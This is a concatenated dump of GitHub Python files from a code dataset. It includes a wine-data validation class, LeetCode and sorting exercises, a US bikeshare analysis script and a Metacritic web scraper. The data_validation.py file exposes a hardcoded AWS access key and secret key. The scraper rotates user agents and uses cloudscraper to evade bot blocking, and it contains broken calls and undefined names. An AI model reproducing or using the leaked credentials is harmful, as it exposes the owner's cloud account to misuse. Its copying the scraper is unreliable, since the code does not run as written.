str(sum_of_digits))\nprint(sum_digit) # 9\n","repo_name":"hyraja/python-starter","sub_path":"Interview_python/sum of digit.py","file_name":"sum of digit.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73023041147","text":"import os\nfrom mlProject import logger\nimport boto3\nfrom mlProject.entity.config_entity import Datavalidationconfig\nimport pandas as pd\n\nclass DataValidation():\n def __init__(self,config:Datavalidationconfig):\n self.config = config\n\n def validate_all_columns(self) -> bool:\n try:\n\n validation_status = None\n\n s3 = boto3.client('s3')\n s3 = boto3.resource(\n service_name='s3',\n region_name='us-east-1',\n aws_access_key_id = 'AKIAU473WEHAZP5Q63UT',\n aws_secret_access_key = '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'\n )\n\n obj = s3.Bucket('vedanshaws').Object('winequality-red.csv').get()\n\n data = pd.read_csv(obj['Body'], index_col=0)\n all_columns = list(data.columns)\n\n all_schema = self.config.all_schema.keys()\n\n for col in all_columns:\n if col not in all_schema:\n validation_status = False\n with open(self.config.status_file, 'w') as f:\n f.write(f\"VALIDATION_STATUS : {validation_status}\")\n\n else:\n validation_status = True\n with open(self.config.status_file,'w') as f:\n f.write(f\"VALIDATION_STATUS : {validation_status}\")\n\n return validation_status\n \n except Exception as e:\n raise e","repo_name":"Vedansh1857/end-to-end-ml-project-with-mlflow","sub_path":"src/mlProject/components/data_validation.py","file_name":"data_validation.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"75096005628","text":"import math\n\ndef filterTags(attrs):\n tags = {\"natural\": \"tree\",\n \"species\": attrs[\"NAMESCIENTIFIC\"]}\n if attrs[\"DIAMETER\"]:\n tags[\"diameter_crown\"] = str(int(round(float(attrs[\"DIAMETER\"])*0.3048)))\n if attrs[\"HEIGHT\"]:\n tags[\"height\"] = str(int(round(float(attrs[\"HEIGHT\"])*0.3048)))\n if attrs[\"TRUNKDIAM\"]:\n diamInches = float(attrs[\"TRUNKDIAM\"])\n circInches = math.pi*diamInches\n circMeters = circInches*0.0254\n tags[\"circumference\"] = str(round(circMeters, 1))\n return tags\n\n","repo_name":"impiaaa/SV-OSM","sub_path":"translations/trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"24958152433","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def detectCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n # Floyd's tortoise and Hare Algo\n \n if head == None:\n return None\n \n tort = head\n hare = head\n \n while True:\n tort = tort.next\n hare = hare.next\n if hare == None or hare.next == None:\n return None\n hare = hare.next\n if hare == tort:\n break\n \n current = head\n while current != hare:\n current = current.next\n hare = hare.next\n return current\n","repo_name":"MrBmikhael/LeetCodeProblems","sub_path":"linked-list-cycle-ii/linked-list-cycle-ii.py","file_name":"linked-list-cycle-ii.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71861062909","text":"import matplotlib.pyplot as plt\n\ndef heapify(array, length, index):\n largest = index\n left_child = index * 2 + 1\n right_child = index * 2 + 2\n\n bars = plt.bar(list(range(len(array))), array, color=\"#BB8FCE\")\n bars[largest].set_facecolor('red')\n plt.pause(0.01)\n plt.clf()\n\n if left_child < length and array[largest] < array[left_child]:\n largest = left_child\n\n if right_child < length and array[largest] < array[right_child]:\n largest = right_child\n\n if largest != index:\n array[index], array[largest] = array[largest], array[index]\n heapify(array, length, largest)\n\n\n bars = plt.bar(list(range(len(array))), array, color=\"#BB8FCE\")\n bars[largest].set_facecolor('red')\n plt.pause(0.01)\n plt.clf()\n\n\ndef heap_sort(array):\n length = len(array)\n\n for i in range((length-2) // 2, -1, -1):\n heapify(array, length, i)\n\n for i in range(length - 1, 0, -1):\n array[i], array[0] = array[0], array[i]\n heapify(array, i, 0)","repo_name":"FurkanBerberr/Sorting-Animation","sub_path":"Sorting/SortingAlgorithms/heapsort.py","file_name":"heapsort.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"37158620533","text":"from sklearn.externals.six import StringIO\nfrom sklearn import tree\nimport pydotplus\nimport matplotlib.pyplot as plt\nX = [[1,1,1,0], [1,1,1,1], [2,1,1,0], [2,3,2,1], [1,2,1,0], [1,3,2,0], [3,2,1,0],\n[3,3,2,0], [3,3,2,1], [3,2,2,0], [1,2,2,1], [2,2,1,1], [2,1,2,0], [3,2,1,0]]\n\nY = [0,0,1,1,0,1,1,1,0,1,1,1,1,0]\nclf = tree.DecisionTreeClassifier()\nclf = clf.fit(X, Y)\n\ndot_data = StringIO()\ntree.export_graphviz(clf, out_file=dot_data)\ngraph = pydotplus.graph_from_dot_data(dot_data.getvalue())\n\ngraph.write_pdf('datavis/game.pdf')\n\n#branchNode = dict(boxstyle='sawtooth', fc='0.8')\n#leafNode = dict(boxstyle = 'round4', fc='0.8')\n#startNode = dict(boxstyle='sawtooth', fc='0.9')\n#def createPlot():\n# fig = plt.figure(1, facecolor='white')\n# fig.clf()\n# createPlot.ax1 = plt.subplot(111, frameon=False)\n# plotNode =('from here', (0.3,0.8), (0.3, 0.8), startNode)\n# plotNode =('a decision node', (0.5, 0.1), (0.3, 0.8), branchNode)\n# plotNode = ('a leaf node', (0.8, 0.1), (0.3, 0.8), leafNode)\n# plt.show()\n \ncreatePlot()","repo_name":"QiliWu/Python-datavis","sub_path":"datavis/sklearn-tree.py","file_name":"sklearn-tree.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"41628545001","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\nmonths = pd.date_range(start='2023-01-01', periods=12, freq='M')\ndata = pd.DataFrame({\n 'x': range(1, 13),\n 'y1': [56, 67, 72, 65, 75, 96, 70, 63, 68, 100, 88, 64],\n 'y2': [74, 80, 77, 56, 50, 71, 66, 91, 91, 68, 95, 79]\n})\nplt.subplots(figsize=(10, 4))\nmonth_names = ['Янв', 'Фев', 'Мар', 'Апр', 'Май', 'Июн', 'Июл', 'Авг', 'Сен', 'Окт', 'Ноя', 'Дек']\nplt.plot(data['x'], data['y1'], 'go', label='Факт', marker='o', linestyle='-', linewidth=2)\nplt.plot(data['x'], data['y2'], 'ro', marker='o', linestyle='-', linewidth=2, label='План')\nfor i in range(len(data)):\n plt.annotate(f\"{data['y1'][i]}\", (data['x'][i], data['y1'][i]), textcoords=\"offset points\",\n xytext=(0, 0), ha='center')\n plt.annotate(f\"{data['y2'][i]}\", (data['x'][i], data['y2'][i]), textcoords=\"offset points\",\n xytext=(0, 0), ha='center')\n if data['y1'][i] > data['y2'][i]:\n plt.plot([data['x'][i], data['x'][i]], [data['y1'][i], data['y2'][i]], '-g', alpha=0.4, linewidth=12)\n else:\n plt.plot([data['x'][i], data['x'][i]], [data['y1'][i], data['y2'][i]], '-r', alpha=0.4, linewidth=12)\n\nplt.legend(loc='lower center', bbox_to_anchor=(0.5, -0.2), ncol=2)\n\nplt.xticks(data['x'], month_names)\nplt.ylim(0, 120)\nplt.title('Динамика продаж(план-факт)')\n\nplt.show()\n","repo_name":"alexeygradskov-22vp1/pythonProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70130650428","text":"import time\nimport pandas as pd\nimport numpy as np\n\nCITY_DATA = {'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv'}\n\n# make global scope variables to be used in any function i want:\n# Project Cities:\nCities = ['chicago', 'new york city', 'washington']\n# Project Months:\nMonths = ['january', 'february', 'march', 'april', 'may', 'june', 'all']\n# Project Weekdays:\nDays = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday', 'all']\n\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n \n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True:\n city = input('Would you like to see data for chicago, new york city , or washington? \\n> ')\n city = city.lower()\n if city in Cities:\n break\n else:\n print(\"invalid input. Please enter a valid input\")\n # get user input for month (all, january, february, ... , june)\n while True:\n month = input('All right! Which month - January, February, March, April, May, or June?'\n ' or just say \\'all\\' to apply no month filter. \\n> ')\n month = month.lower()\n if month in Months:\n break\n else:\n print(\"invalid input. Please enter a valid input\")\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n while True:\n day = input('All right! Which day - Monday, Tuesday, Wednesday, Thursday, Friday, Saturday, or Sunday?'\n 'or just say \\'all\\' to apply no day filter. \\n> ')\n day = day.lower()\n if day in Days:\n break\n else:\n print(\"invalid input. Please enter a valid input\")\n\n \n print('-' * 40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n # Same as Practice Problem #3: Load and Filter the Dataset\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city])\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n\n '''\n df['day_of_the_week'] = df['Start Time'].dt.weekday_name\n AttributeError: 'DatetimeProperties' object has no attribute 'weekday_name'\n Resolved \n https://stackoverflow.com/questions/60339049/weekday-name-from-a-pandas-dataframe-date-object?answertab=votes#tab-top\n _/ weekday_name to day_name() _/\n '''\n\n df['week_day'] = df['Start Time'].dt.day_name()\n\n # filter by month if applicable\n if month != 'all':\n # use the index of the months list to get the corresponding int\n month = Months.index(month) + 1\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n # filter by day of week if applicable\n if day != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['week_day'] == day.title()]\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n common_month = df['month'].mode()[0]\n print('Most Frequent Month is :', common_month)\n # display the most common day of week\n common_week_day = df['week_day'].mode()[0]\n print('Most Frequent Day is :', common_week_day)\n # display the most common start hour\n df['hour'] = df['Start Time'].dt.hour\n common_start_hour = df['hour'].mode()[0]\n print('Most Frequent Start Hour is :', common_start_hour)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n # display most commonly used start station\n most_commonly_start_stat = df['Start Station'].mode()[0]\n print('Most Commonly used Start Station is :', most_commonly_start_stat)\n # display most commonly used end station\n most_commonly_end_stat = df['End Station'].mode()[0]\n print('Most Commonly used End Station is :', most_commonly_end_stat)\n # display most frequent combination of start station and end station trip\n '''\n File \"F: lib\\site-packages\\pandas\\core\\indexes\\base.py\", line 3363, in get_loc\n raise KeyError(key) from err\n KeyError: ('Start Station', 'End Station')\n Resolved \n _/ instead of [0] use .loc[0] _/\n '''\n commonly_start_to_end_stat = df[['Start Station', 'End Station']].mode().loc[0]\n print('Most Frequent Combination of Start Station and End Station trip : {}, {}'\n .format(commonly_start_to_end_stat[0], commonly_start_to_end_stat[1]))\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n total_time = df['Trip Duration'].sum()\n print('Total Travel Time : ', total_time)\n # display mean travel time\n mean_time = df['Trip Duration'].mean()\n print('Mean Travel Time : ', mean_time)\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n user_types = df['User Type'].value_counts()\n print(user_types)\n # Display counts of gender\n while True:\n if 'Gender' in df.columns or 'Birth Year' in df.columns:\n gender_types = df['Gender'].value_counts()\n print(gender_types)\n # Display earliest, most recent, and most common year of birth:\n birth_year = df['Birth Year']\n # the most common birth year\n common_year = birth_year.mode()[0]\n print(\"The most common birth year:\", common_year)\n # the most recent birth year\n most_recent = birth_year.max()\n print(\"The most recent birth year:\", most_recent)\n # the most earliest birth year\n earliest_year = birth_year.min()\n print(\"The most earliest birth year:\", earliest_year)\n break\n else:\n print('Gender Stats can\\'t be determined')\n break\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef raw_data(df):\n print('\\nCalculating Raw Data Stats...\\n')\n start_time = time.time()\n x = 0\n while True:\n raw = input('Do you like to see example from the raw Data, if you want type \\'yes\\' if else type \\'no\\' \\n>')\n raw = raw.lower()\n if raw != 'yes':\n print('Thank you for Exploring US BikeShare')\n break\n else:\n x = x + 5\n print(df.iloc[x: x + 5])\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n raw_data(df)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"BelalMA/Udacity-BikeShare-Project","sub_path":"US_bikeshare.py","file_name":"US_bikeshare.py","file_ext":"py","file_size_in_byte":8455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"13879868943","text":"# 230122\n# 백준 1946번\n\nfrom sys import stdin\n\ntest_case = int(stdin.readline())\n\nresult = []\n\nfor i in range(test_case) :\n result = []\n num = int(input())\n for _ in range(num) :\n result.append(list(map(int, stdin.readline().split())))\n man_sorted = sorted(result, key = lambda x : x[0])\n \n \n man = man_sorted[0][1]\n cnt = 1\n for m in range(1, num) :\n if man_sorted[m][1] < man :\n man = man_sorted[m][1]\n cnt += 1 \n print(cnt)\n \n# 이중 for문으로 시간 초과가 일어남 => 시간 초과를 해결하기 위해 for문을 하나로 줄여야함\n# 첫번째 항목으로 정렬되어 있는 경우 : 이때 뒤에 있는 항이 앞에 있는 항의 [1] 값보다 값이 작으면 고용될 수 있다\n# 그때 고용이 가능한 기준의 사람을 해당 사람으로 설정하고 계속해서 비교해 나간다\n## 이중 for문을 없앨 때 쓰면 좋은 아이디어!! \n## + 리스트 내의 값들을 모두 비교할 때","repo_name":"codusl100/algorithm","sub_path":"백준/그리디/신입사원.py","file_name":"신입사원.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21458397874","text":"out_interface = input('��ведите режим работы интерфейса (trunk/access): ')\nout_type = input('Введите тип и номер интерфейса: ')\nout_vlan = input('Введите номер влан(ов): ')\n\naccess_out = '''\n interface {inter}\n switchport mode access\n switchport access vlan {vlan}\n switchport nonegotiate\n spanning-tree portfast\n spanning-tree bpduguard enable\n '''\n\ntrunk_out = '''\n interface {inter}\n switchport trunk encapsulation dot1q\n switchport mode trunk\n switchport trunk allowed vlan {vlan}\n '''\n\n\n#TRUNK\ntrunk_user = trunk_out.format(inter=out_type, vlan=out_vlan)\n#ACCESS\naccess_user = access_out.format(inter=out_type, vlan=out_vlan)\n\n#OUT\n\nif out_interface == 'trunk':\n print(trunk_user)\nelif out_interface == 'access':\n print(access_user)\nelse:\n print('-' * 10)\n print('Неправильный режим работы интерфейса')\n","repo_name":"kostyalmete/my-python","sub_path":"05/5.3py.py","file_name":"5.3py.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"37509076306","text":"import cloudscraper\nscraper = cloudscraper.create_scraper()\nimport time\nfrom bs4 import BeautifulSoup\nimport re\nimport publicsuffix\nimport urllib.parse\n\ndef get_page(url, root=False):\n \"\"\"\n URL is provided and the output should be the scraped page's HTML. There are many different request attempts \n before False is returned, meaning that the URL should be set aside to try again later or find another means\n to scrape it. \n \"\"\"\n \n user_agent_list = [\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36'\n ]\n \n headers1 = {'User-Agent': np.random_choice(user_agent_list)}\n \n headers2 = {'User-Agent': np.random_choice(user_agent_list), \n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',\n 'Accept-Language': 'en-GB,en-US;q=0.9,en;q=0.8', \n 'Connection': 'keep-alive'}\n\n response = requests.get(url)\n if response.status_code == 200:\n time.sleep(3)\n return bs(response.text, 'html.parser')\n \n time.sleep(5)\n response = scraper.get(url, headers=headers)\n if response.status_code == 200:\n time.sleep(3)\n return bs(response.text, 'html.parser')\n \n time.sleep(5)\n response = requests.get(url, headers=headers)\n if response.status_code == 200:\n time.sleep(3)\n return bs(response.text, 'html.parser')\n time.sleep(3)\n \n response = scraper.get(url, headers=headers2)\n if response.status_code == 200:\n time.sleep(3)\n return bs(response.text, 'html.parser')\n time.sleep(5)\n \n response = requests.get(url, headers=headers2)\n if response.status_code == 200:\n time.sleep(3)\n return bs(response.text, 'html.parser')\n time.sleep(5)\n \n ## getting root of url\n if not root:\n psl = publicsuffix.fetch()\n hostname = parse.urlparse(url).hostname\n root = publicsuffix.get_public_suffix(hostname, psl)\n \n ## getting cookies to try one last time\n session = requests.Session()\n cookies = session.get(root)\n response = requests.get(url, cookies=cookies, header=headers1)\n if response.status_code == 200:\n time.sleep(3)\n return bs(response.text, 'html.parser')\n \n ## one last try for the sake of hope\n response = scraper.get(url)\n if response.status_code == 200:\n time.sleep(3)\n return False\n else:\n return bs(response.text, 'html.parser')\n \ndef page_movies_info(html):\n \"\"\"\n Takes a list of HTMLs, each HTML being the webpage that had the results for 100 movies in the rank from highest metascore to the lowest. Returns a DataFrame with the release date, the link to the individual film, the MPAA rating, and the metacritic and userscore. \n \"\"\"\n all_movies = []\n tables = bs.find_all('table')\n for table in tables:\n movies = table.find_all('td', class_='clamp-summary-wrap')\n for movie in movies:\n title_link = movie.find('a', class_=\"title\", href=True)\n title = title_link.text\n href = title_link['href']\n link = f'https://www.metacritic.com/{href}'\n release_details = movie.find('div', class_=\"clamp-details\")\n release_date = release_details.find('span', class_=False).text\n mpaa = release_details.find('span', class_=True)\n if mpaa is None:\n mpaa = 'Not Rated'\n else:\n mpaa = mpaa.text.replace('|', '').strip()\n metacritic = movie.find('div', class_=\"clamp-metascore\").text.replace('Metascore:', '').strip()\n userscore = movie.find('div', class_='clamp-userscore').text.replace('User Score:', '').strip()\n all_movies.append([title, release_date, link, mpaa, metacritic, userscore])\n df = pd.DataFrame(all_movies, columns=['title', 'release_date', 'link', 'mpaa', 'metacritic', 'userscore'])\n df.release_date = pd.to_datetime(df.release_date)\n return df \n\n \ndef get_cast_crew_details_page(row):\n \"\"\"\n Takes in the link to another webpage\n \"\"\"\n link = row.loc['link']\n movie_detail_link = f'{link}/details'\n # return will either be website's HTML or False because we weren't able to webscrape\n return get_page(movie_detail_link, root='https://www.metacritic.com')\n \ndef table_search(movie_title, role_or_details):\n \"\"\"\n Takes in the film title and returns a tag to help find the table. \n \"\"\"\n table_finder = {\n 'ends_with_s': {'Details': f'{movie_title} Details and Credits', \n 'Director': f\"{movie_title}' Director Credits\", \n 'Writer': f\"{movie_title}' Writer Credits\", \n 'Principle cast': f\"{movie_title}' Principal Cast Credits\",\n 'Supporting cast': f\"{movie_title}' Cast Credits\",\n 'Producer': f\"{movie_title}' Producer Credits\"},\n \n 'other': {'Details': f'{movie_title} Details and Credits', \n 'Director': f\"{movie_title}'s Director Credits\", \n 'Writer': f\"{movie_title}'s Writer Credits\", \n 'Princple cast': f\"{movie_title}'s Principal Cast Credits\", \n 'Supporting cast': f\"{movie_title}'s Cast Credits\", \n 'Producer': f\"{movie_title}'s Producer Credits\"}\n }\n \n if movie_title[-1] in ['s', 'S']:\n table = table_finder['ends_with_s'][role_or_details]\n else:\n table = table_finder['other'][role_or_details]\n \n return table\n\n\n\n\ndef get_details(htmls, movie_list):\n credit_details = []\n count = 0\n for html in htmls:\n \n if not html:\n credit_details.append([count, None, None])\n count += 1\n continue\n \n movie_title = movie_list.iloc[0]['movie_title']\n year = movie_list.iloc[0]['release_date'].year\n \n table_details = html.find('table', class_=\"details\", \n summary=table_search(movie_title, \n 'Details'))\n if not table_details:\n table_details = html.find('table', class_=\"details\", \n summary=f'{movie_title} ({year}) Details and Credits')\n if not table_details: \n credit_details.append([count, None, None])\n count += 1\n continue\n \n detail_trs = table_details.find_all('tr')\n for tr in detail_trs:\n label = ''.join(tr['class']).strip().replace('_', ' ')\n data = tr.find('td', class_='data').text.strip()\n credit_details.append([count, label, data])\n count += 1\n \n return pd.DataFrame(credit_details, columns=['movie_id', 'label', 'data'])\n \ndef get_cast_crew(htmls, movie_list):\n \n ## all data that is collected from metacritic will be appended here and then we will insert into PostgreSQL\n cast_crew_credits = []\n \n ## the count will help us keep track of the movie ID that we are on so that everything matches up at the end \n ## to insert into PostgreSQL\n count = 0\n for html in htmls:\n \n # append the count and None values to mark there was no html for this and then move on to the next html\n if not html:\n cast_crew_credits.append([count, None, None, None])\n count += 1\n continue \n \n # otherwise, first step is to look up the name of the movie\n movie_title = movie_list.iloc[0].movie_title\n \n # find director table\n table_directors = soup.find('table', class_=\"credits\", \n summary=table_search(movie_title, 'Director'))\n \n # if no table move on \n if not table_directors:\n cast_crew_credits.append([count, None, None, None])\n \n # look up the value for the director(s) and append them to the list\n else:\n director_tds = table_directors.find_all('td', class_=\"person\")\n for td in director_tds:\n label = 'Director'\n data = get_person(tr)\n href = get_href(tr)\n cast_crew_credits.append([count, label, data, link])\n \n ## for the writers, cast members, and other production workers the same operation as above will happen\n table_writers = soup.find('table', class_=\"credits\", \n summary=table_search(movie_title, 'Writer'))\n if table_writers is None:\n cast_crew_credits.append([count, None, None, None]) \n else:\n writer_tds = table_writers.find_all('td', class_=\"person\")\n for td in writer_tds:\n label = 'Writer'\n data = get_person(tr)\n href = get_href(tr)\n cast_crew_credits.append([count, label, data, link])\n\n table_prin_cast = soup.find('table', class_=\"credits\", \n summary=table_search(movie_title, 'Principle cast'))\n if table_prin_cast is None:\n cast_crew_credits.append([count, None, None, None])\n else:\n prin_cast_tds = table_prin_cast.find_all('td', class_=\"person\")\n for td in prin_cast_tds:\n label = 'Principle Cast'\n data = get_person(tr)\n href = get_href(tr)\n cast_crew_credits.append([count, label, data, link])\n\n table_cast = soup.find('table', class_=\"credits\", \n summary=table_search(movie_title, 'Supporting cast'))\n if table_cast is None:\n cast_crew_credits.append([count, None, None, None])\n else:\n cast_tds = table_cast.find_all('td', class_=\"person\")\n for td in cast_tds:\n label = 'Cast (non-principle)'\n data = get_person(tr)\n href = get_href(tr)\n cast_crew_credits.append([count, label, data, link])\n\n table_producer = soup.find('table', class_=\"credits\", \n summary=table_search(movie_title, 'Producer'))\n \n if table_producer is None:\n ## adding one to the count because this is the last step for current row, if table is existant then \n ## one will be added to the count below\n cast_crew_credits.append([count, label, data, link]) \n count += 1\n \n else: \n producer_trs = table_producer.find_all('tr')\n for tr in producer_trs:\n label = get_label(tr)\n if not label:\n cast_crew_credits.append([count, label, data, link])\n else:\n data = get_person(tr)\n href = get_href(tr)\n cast_crew_credits.append([count, label, data, link])\n count += 1\n return pd.DataFrame(cast_crew_credits, columns=['movie_id', 'label', 'person', 'link'])\n \n \ndef get_label(data):\n \"Returns the role or credit a person or item had in the film.\"\n label = data.find('td', class_=\"role\")\n if not label:\n return False\n return label.text.strip()\n\ndef get_person(data):\n \"Returns the person or text for an item in the HTML.\"\n wanted = data.find('a')\n return wanted.text.strip()\n\ndef get_href(data):\n \"Return the link back for a page's link to another page. \"\n wanted = data.find('a')\n href = wanted['href'].strip()\n if not href:\n link = np.nan\n else:\n link = f'https://www.metacritic.com{href}'\n return link\n\ndef get_metacritic(start_page=0, end_page=136, list_of_pages=False):\n \"\"\"\n The input for this function is set to how many pages of released films there were at the time. Should this \n code be reused the pages can be set to whatever need be. The first page that shows up with top scoring movie \n #1 to #100 is considered page 0 in the URL. \n The return consists of the retry pages that will need to be run again, the list of all films and their scores as well as release dates, the cast and crew involved with each film, and the runtime, production company, etc details. \n \"\"\"\n if not list_of_pages:\n pages = range(startpage, end_page+1)\n else:\n pages = list_of_pages\n metacritic_scores_dates = False\n retry = []\n cast_crew_retry = []\n details = False\n cast_crew = False\n for page in pages:\n html = get_html(f'https://www.metacritic.com/browse/movies/score/metascore/all/filtered?page={page}')\n if not html:\n retry.append(page)\n continue \n films_list = page_movies_info(html)\n \n if not metacritic_scores_dates:\n metacritic_scores_dates = films_list\n else:\n metacritic_scores_date = pd.concat([metacritic_score_dates, films_list])\n \n movie_credit_htmls = films_list.apply(lambda x: get_cast_crew_details_page(row=x['link']))\n film_details = get_details(movie_credit_htmls, films_list)\n cast_crew_credits = get_cast_crew(movie_credit_htmls, films_list)\n \n ## if details is still None then we are assigning it the first DataFrame\n if not details:\n details = film_details\n ## if details is assigned a DataFrame then we are assigning it the concat of the two\n else:\n details = pd.concat([detail, film_details])\n ## the same deal with the cast and crew DataFrame and the cast_crew variable\n if not cast_crew:\n cast_crew = cast_crew_credits\n else:\n cast_crew = pd.concat([cast_crew, cast_crew_credits])\n \n return retry, metacritic_scores_dates, details, cast_crew\n ","repo_name":"seansisler/project_luther","sub_path":"webscraping_metacritic.py","file_name":"webscraping_metacritic.py","file_ext":"py","file_size_in_byte":14449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"5695632711","text":"\"\"\"\nMerge Sort\n########################################################################################################################\nA Divide & Conquer algorithm\n########################################################################################################################\nStable Sort\n########################################################################################################################\nUsecase:\n No Space Constraints\n Large Data Sets - Efficient for sorting large-scale data due to its O(n log n) time complexity\n External Sorting - Ideal when dataset exceed memory capacity, using sequential external storage operations.\n Linked List - Effective for sorting linked lists by reordering links, minimizing data handling overhead.\n########################################################################################################################\nSpace Complexity: O( n ) + O( log n ) [Where, O(log n) is the auxiliary stack space]\n########################################################################################################################\nTime Complexity:\n Best: O( n log n )\n Average: O( n log n )\n Worst: O( n log n )\n\"\"\"\nimport os\n\n\ndef merge(arr, start, mid, end):\n merged_list = [] # Temporary array\n lidx = start # Starting index of left half\n ridx = mid+1 # Starting index of right half\n\n while lidx <= mid and ridx <= end: # Storing elements in the temporary array in a sorted manner\n if arr[ lidx ] <= arr[ ridx ]:\n merged_list.append(arr[lidx])\n lidx += 1\n else:\n merged_list.append(arr[ridx])\n ridx += 1\n \n while lidx <= mid: # If elements are still left on the left half\n merged_list.append(arr[lidx])\n lidx += 1\n \n while ridx <= end: # If elements are still left on the right half\n merged_list.append(arr[ridx])\n ridx += 1\n \n for i in range(start, end+1): # Transfering all elements from temporary to arr\n arr[i] = merged_list[i - start]\n\n\ndef mergesort(arr, start, end):\n if start >= end: # Further divide not possible\n return\n \n mid = start + (end - start)//2 # same - (start + end)//2\n\n mergesort(arr, start, mid) # Divide left half\n mergesort(arr, mid+1, end) # Divide right half\n\n merge(arr, start, mid, end) # Conquer left & right halves\n\n\nif __name__ == '__main__':\n os.system('cls' if os.name == 'nt' else 'clear')\n\n arr = [5,3,5,8,7,2]\n print(f'Original = {arr}')\n\n mergesort(arr, 0, len(arr)-1)\n print(f'Ascending = {arr}')\n","repo_name":"djsarkar93/w2x","sub_path":"DSA/Striver's A-Z DSA Course/[002] Sorting Techniques/004_merge_sort.py","file_name":"004_merge_sort.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39490802114","text":"import os\nimport sys\nimport time\n\nfrom _02_Choix import ChoixFichier, ChoixDossier\nfrom _03_ChargerUneClef_V2 import ChargerUneClef\nfrom _02_File import File\nfrom _02_KeyFile import Key\nfrom _02_Classes import *\nfrom _01_AlgoG import 